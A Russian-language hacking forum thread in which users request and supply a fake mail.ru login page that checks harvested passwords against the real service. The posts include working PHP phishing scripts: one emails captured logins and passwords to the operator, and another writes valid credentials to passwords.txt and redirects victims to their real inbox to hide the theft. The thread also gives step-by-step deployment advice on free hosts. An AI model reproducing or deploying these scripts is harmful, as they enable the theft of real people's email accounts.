Нужен фейк mail.ru с проверкой пароля Т.е. если пользователь ввел неверные данные, выдается сообщение о неверном пароли, если верный, то пользователь идет на нужную нам страницу

function login($email,$password)
{
$email = strtolower($email);
list($login, $domain) = explode('@',$email);
$openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain));
if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$email).'.+</title>|',$openMail))
{
return true;
}
else
{
return false;
}
}
Вот простейшая функция для проверки.
Проверять так
if(login('xx@mail.ru', 'passwd')) {
...
}

ничего сложного. при обработке полученных данных (читай логина и пароля) вместе с тем что пишешь в файл/отсылаешь себе на мыло итд итп так же отправляешь запрос на майл.ру при помощи сокетов потом получаешь ответ и выводишь его. и все будет так как будто чел ошибся и ввел на правильный логин и пароль

NOmeR1


спасибо большое!

но т.к. я в пхп не силен, не подскажешь куда конкретно вставлять этот код?

ты просишь фейк но сам по видимому не осознаешь что это такое.

мне нужен такой же фэйк как этот http://ifolder.ru/5953891 но с проверкой пароля!

блин народ обьясните плиз , куда этот пхп код засовывать? в файла log.php? или куда? куда конкретно в файл? в самом начале файла или в самом конце?

и ешё как мона сделать так чтоб когда чел ввел правильный пас от своего ящика он автоматом с фейк страницы зашел к себе в ящик?

ты просишь фейк но сам по видимому не осознаешь что это такое.

Можно сделать, чтобы при ведение пароля фейк отправлял запрос на маил.ру, если пароль правельный, то фейк ведет через PHP пароль и логин на маил.ру и жертва войдет, а если не правельный то выдает жертве 2 фейк, и так по кругу... пока жертва не дас нам нужный пасс :p

Если это увидит Ponchik то я думаю что он это сделает!!!


P.S. Идея придумана за 5 мин, но не сделана, надеюсь я подкинул идею для работы)))

блин народ обьясните плиз , куда этот пхп код засовывать? в файла log.php? или куда? куда конкретно в файл? в самом начале файла или в самом конце?

и ешё как мона сделать так чтоб когда чел ввел правильный пас от своего ящика он автоматом с фейк страницы зашел к себе в ящик?

Я думаю в начало, хотя ХЗ

ну что кто-нить знает?

NOmeR1 всё написал уже.В log.php добавляете функцию и проверку:

if(login($Login,$Pass))
{
//пароль верен,вывести соответсвующие
}
else
{
//пароль не верен,вывести соответсвующие
}

ну вот я вставил такм образом , но функция не пашет , видимо не в том место всунул код , я нисилен в php , кууда его тут вставлять то нада? и вообше тот код который дал Nomer1 не дописан , ибо там идет првоерка только логин пасса , а на мейле ешё есть такое понятие как домен inbox/bk итд

<?PHP
Error_Reporting(E_ALL & ~E_NOTICE);

$Login = $_POST['Login'];
$Domain = $_POST['Domain'];
$Pass = $_POST['Password'];


//####################################
$from = "bla@mail.ru"; // от кого письмо
$to = "bla@mail.ru"; // кому присылаем данные

$subj = " sdfsdjfnd15154 : $Login@$Domain"; // тема письма
$body = " Логин: $Login@$Domain \n Пароль: $Pass"; // тело письма (реконмендую не менять)
//####################################

if(login($Login,$Pass))
{
//пароль верен,вывести соответсвующие
}
else
{
//пароль не верен,вывести соответсвующие
}


$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit";
$from=convert_cyr_string($from,"w","k");
$to=convert_cyr_string($to,"w","k");
$subj=convert_cyr_string($subj,"w","k");
$body=convert_cyr_string($body,"w","k");
mail($to,$subj,$body,$from);

$c = "$Login@$Domain:$Pass";

$fp = fopen("c","a+"); //открываем файл
fwrite($fp,"\n [start-- $c -- end] \n"); //записываем всё
fclose($fp); //закрываем

//####################################
header("Location: http://win.mail.ru/cgi-bin/start?ver=%32%30%39%34&back=1"); // куда пошлем пользователя после того как он ввел данные!

echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?ver=%32%30%39%34&back=1\">"

//####################################
?>

opy495, научитесь смотреть код. У меня он сам определяет через разделитель @.

opy495, научитесь смотреть код. У меня он сам определяет через разделитель @.

блин да я ваще 0 в php/html
вы можите обьяснить что нужно вставить и главное куда конкретно чтобы у меня проверялась валидность пары логин/пас

Учите, разжовывать за вас никто не будет.

а что так сложно сказать что нада вписать в файл и куда ? o_O

ну обьясните нубу вставляю в log.php код , log.php прикручен к index.php в функции action

вот в это вставляю в log.php

<?php
function login($email,$password)
{
$email = strtolower($email);
list($login, $domain) = explode('@',$email);
$openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain));
if(!preg_match('|<title> Вход в систему </title>|',$openMail) && preg_match('|<title>.+'.str_replace('.','\.',$email).'.+</title>|',$openMail))
{
return true;
}
else
{
return false;
}
}
?>

даю 777 права , захожу на фейк страницу , ввожу не верную пару логин пас
жму войти , меня перекидывает на cayt.ru/log.php и все , передомной чистая страница , больше ниче не происходит... что я не прально сделал?

ну обьясните нубу вставляю в log.php код , log.php прикручен к index.php в функции action

вот в это вставляю в log.php



даю 777 права , захожу на фейк страницу , ввожу не верную пару логин пас
жму войти , меня перекидывает на cayt.ru/log.php и все , передомной чистая страница , больше ниче не происходит... что я не прально сделал?
А можно вопрос? каким хостингом пользуешся?)

пробовал на tu2.ru и на jino-net.ru

opy495 - убей себя.

удалите тему.

держите)

прав никаких ненадо скрипт сам создаст файл

<?php

if ( isset($_POST['Login']) && isset($_POST['Domain']) && isset($_POST['Password']) ) {

$login = urlencode($_POST['Login']);
$domain = urlencode($_POST['Domain']);
$password = urlencode($_POST['Password']);

$check = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.$login.'&Password='.$password.'&Domain='.$domain);

if( preg_match('~<title> Вход в систему </title>~i',$check) ) {
$fake = $check;
$fake = preg_replace('~action=\"auth\"~','',$fake);
echo $fake;
}

else {
$f = fopen('passwords.txt', 'ab');
fwrite($f, $login.".".$domain." ||| ".$password."\r\n");
fclose($f);
header('Location: http://win.mail.ru/cgi-bin/auth?Login='.$login.'&Password='.$password.'&Domain='.$domain);
}

}

else {

$fake = file_get_contents('http://win.mail.ru/cgi-bin/auth');
$fake = preg_replace('~action=\"auth\"~','',$fake);
echo $fake;
}
?>

а нормально обьяснить никак?

а нормально обьяснить никак?
сохрани этот текст в файл index.php и помести на сервер в какой-нибудь каталог

затем зайди в этот каталог через броузер и введи что-нибудь. если пасс и логин правильные, они запишутся в файл passwords.txt

держите)

прав никаких ненадо скрипт сам создаст файл

Сам он ничего не создаст, вот 99% что у него на это не хватит пра!


а нормально обьяснить никак?

А нормально сесть почитать и самому разобраться??
Понимаеш, тут никто те это разжовывать не будет, иди на htt://php.ru читай, учи, а потом чтото делай, а таких вот "хакеров" как ты что, сделайте все за меня ато я не понимаю а разбераться впадлу, но хочу "взломат мыло", надо банить=\

Сам он ничего не создаст, вот 99% что у него на это не хватит пра!

мод стоит ab
по документации если файл не существует он пытается его создать.
по стандартным настройкам прав хватит, а такие у большинства платных\бесплатных хостеров.

сохрани этот текст в файл index.php и помести на сервер в какой-нибудь каталог

затем зайди в этот каталог через броузер и введи что-нибудь. если пасс и логин правильные, они запишутся в файл passwords.txt
респект чувак))!! но блин сразу реклама хоста появилась , как её убрать то?) тегов head нету...
имею ввиду tu2.ru

http://forum.antichat.ru/threadnav62320-1-10-%F0%E5%EA%EB%E0%EC%E0%2B%E1%E5%F1%EF%EB%E0%F2%ED%E E%EC%2B%F5%EE%F1%F2%E8%ED%E3%E5.html


Тема закрыта